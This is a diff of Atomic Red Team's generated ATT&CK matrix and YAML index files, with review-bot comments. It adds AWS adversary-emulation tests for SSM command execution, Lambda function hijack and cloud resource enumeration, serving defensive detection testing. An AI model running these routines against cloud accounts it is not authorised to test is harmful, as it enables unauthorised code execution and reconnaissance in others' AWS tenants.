| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Query Registry](../../T1012/T1012.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
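Review bot: same dead-link concern for the two rows that change here: Cloud Administration Command now links to ../../T1651/T1651.md and Serverless Execution to ../../T1648/T1648.md, while the index hunks in this compare add both identifiers with atomic_tests: []. Either the generator should keep emitting CONTRIBUTE A TEST for techniques whose test list is empty, or the linked pages must exist before the matrix points at them.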
+1 -1
View File
@@ -10,7 +10,7 @@
| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
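Review bot: the AutoHotKey & AutoIT row in this second matrix file changes the same way as in the first (CONTRIBUTE A TEST replaced by a link to ../../T1059.010/T1059.010.md) and needs the same check that the target page is generated for a technique whose atomic_tests list is empty.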
+9 -5
View File
@@ -26137,7 +26137,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -26189,6 +26189,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
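Review bot: the added identifier: T1059.010 / atomic_tests: [] pair is what flips the generated matrix rows above from CONTRIBUTE A TEST to a link. If the generator treats presence in the index as "has tests", an empty list either needs explicit handling in the generator or the entry should be left out until a test is contributed; the same applies to the T1651 and T1648 entries added in the next two hunks.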
@@ -27527,6 +27528,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -27702,6 +27704,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -33890,7 +33893,7 @@ persistence:
= \"#{username}\" \n$password = \"#{password}\"\naz ad user create
--display-name $username --password $password --user-principal-name $userprincipalname\naz
ad user list --filter \"displayname eq 'atomicredteam'\" "
cleanup_command: az ad user delete --id
cleanup_command: az ad user delete --id "#{userprincipalname}"
name: powershell
T1098:
technique:
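Review bot: the cleanup fix is correct: the previous `az ad user delete --id` had no argument, so cleanup would have errored out and left the test account in the tenant. While here, the verification lookup a few lines up hardcodes `az ad user list --filter \"displayname eq 'atomicredteam'\"` even though the account is created with `$username = \"#{username}\"`; if the username input is overridden, that check no longer finds the account the test created. Use the same `#{username}` placeholder in the filter.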
@@ -45669,7 +45672,7 @@ credential-access:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
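Review bot: the change in this hunk is not visible in the rendered diff (old and new `default:` lines read identically, so only whitespace differs), and the username input still has no default value. That is acceptable for a credential input, but the description should state that the value must be supplied at run time so the test does not fail with an empty username; the identical hunk for the Azure AD password input below has the same property.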
@@ -51425,7 +51428,7 @@ discovery:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -58327,7 +58330,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -58345,6 +58348,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
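Review bot: identifier: T1595.003 is added with atomic_tests: [], the same pattern as the T1059.010, T1651 and T1648 entries earlier in this file; make sure the generator renders an empty test list as CONTRIBUTE A TEST rather than as a link to a page that does not exist yet.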
+6 -2
View File
@@ -25813,7 +25813,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25865,6 +25865,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -27315,6 +27316,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -27490,6 +27492,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -57499,7 +57502,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -57517,6 +57520,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+6 -2
View File
@@ -25511,7 +25511,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25563,6 +25563,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -26901,6 +26902,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -27076,6 +27078,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -56874,7 +56877,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -56892,6 +56895,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+6 -2
View File
@@ -25395,7 +25395,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25447,6 +25447,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -26785,6 +26786,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -26960,6 +26962,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -56700,7 +56703,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -56718,6 +56721,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+207 -9
View File
@@ -11964,7 +11964,7 @@ defense-evasion:
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
cleanup_command:
name: sh
elevation_required: false
- name: AWS CloudWatch Log Stream Deletes
@@ -12009,7 +12009,7 @@ defense-evasion:
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
cleanup_command:
name: sh
elevation_required: false
T1564.003:
@@ -21136,7 +21136,7 @@ privilege-escalation:
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
to elevate their privileges to gain more accesss
'
supported_platforms:
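Review bot: the description fix in this hunk is only half done. "privilieges" becomes "privileges", but "accesss" on the same line keeps its third "s", and "Adversaries create AWS group, add users to specific to that group" is still ungrammatical. Since this is a generated index, the correction belongs in the source test YAML, e.g. "Adversaries create an AWS group and add users to that group to elevate their privileges and gain more access".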
@@ -25832,7 +25832,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25884,6 +25884,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -27222,7 +27223,72 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1651
atomic_tests:
- name: AWS Run Command (and Control)
auto_generated_guid: a3cc9c95-c160-4b86-af6f-84fba87bfd30
description: 'This test simulates an adversary using the AWS Run Command service
to execute commands on EC2 instances.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
region:
description: AWS region to deploy the EC2 instance
type: string
default: us-east-2
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
- description: 'Terraform must be installed.
'
prereq_command: 'terraform --version
'
get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
'
executor:
command: |
Import-Module "PathToAtomicsFolder/T1651/src/T1651-1/AWSSSMAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
Invoke-SSMAttack -AWSProfile "T1651-1" -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
name: powershell
T1059.005:
technique:
modified: '2024-10-15T16:43:27.104Z'
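Review bot: the new "AWS Run Command (and Control)" test has no `cleanup_command`; `terraform destroy` is the last line of the executor `command`, so if `Invoke-SSMAttack` (or the `apply`) throws, the EC2 instance Terraform created is left running and billing in the target account. The sibling T1648 test below puts its `destroy` in `cleanup_command`; this test should do the same, and add the equivalent of `Remove-TFFiles` so `.tfstate` and the plan output do not linger under `PathToAtomicsFolder/T1651/src/T1651-1`.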
@@ -27397,7 +27463,81 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
identifier: T1648
atomic_tests:
- name: Lambda Function Hijack
auto_generated_guid: 87a4a141-c2bb-49d1-a604-8679082d8b91
description: 'Modify an existing Lambda function to execute arbitrary code.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
region:
description: AWS region to deploy the EC2 instance
type: string
default: us-east-2
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
- description: 'Terraform must be installed.
'
prereq_command: 'terraform --version
'
get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
'
executor:
command: |
Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1"
Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
Invoke-LambdaAttack -AWSProfile "T1648-1" -AWSRegion $region
cleanup_command: |
Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
Remove-MaliciousUser -AWSProfile "T1648-1"
Remove-TFFiles -Path "PathToAtomicsFolder/T1648/src/T1648-1/"
name: powershell
T1204.001:
technique:
modified: '2024-09-10T16:40:03.786Z'
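Review bot: the `region` argument text in the "Lambda Function Hijack" test, `description: AWS region to deploy the EC2 instance`, is copied from the T1651 test; this test deploys and modifies a Lambda function, not an EC2 instance. The cleanup also calls `Remove-MaliciousUser -AWSProfile "T1648-1"`, which implies the test creates an IAM user, yet the one-line description ("Modify an existing Lambda function to execute arbitrary code.") does not mention it; the description should list everything the test creates so operators know what to look for if cleanup fails.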
@@ -33394,7 +33534,7 @@ persistence:
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
to elevate their privileges to gain more accesss
'
supported_platforms:
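Review bot: same partial fix as in the privilege-escalation copy of this test: "accesss" still has three "s" and "add users to specific to that group" remains; correct it once in the source test YAML so both generated copies pick it up.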
@@ -52318,7 +52458,64 @@ discovery:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1526
atomic_tests: []
atomic_tests:
- name: AWS - Enumerate common cloud services
auto_generated_guid: aa8b9bcc-46fa-4a59-9237-73c7b93a980c
description: 'Upon successful execution, this test will enumerate common resources
that are contained within a valid AWS account.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
regions:
description: AWS regions
type: string
default: us-east-1,us-east-2,us-west-1,us-west-2
output_directory:
description: Directory to output results to
type: string
default: "$env:TMPDIR/aws_discovery"
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
executor:
command: |
Import-Module "PathToAtomicsFolder\T1526\src\AWSDiscovery.ps1"
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$regions = "#{regions}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile
Get-AWSDiscoveryData -Regions $regions -OutputDirectory "#{output_directory}"
Remove-BlankFiles -OutputDirectory "#{output_directory}"
name: powershell
T1018:
technique:
modified: '2023-08-14T19:08:59.741Z'
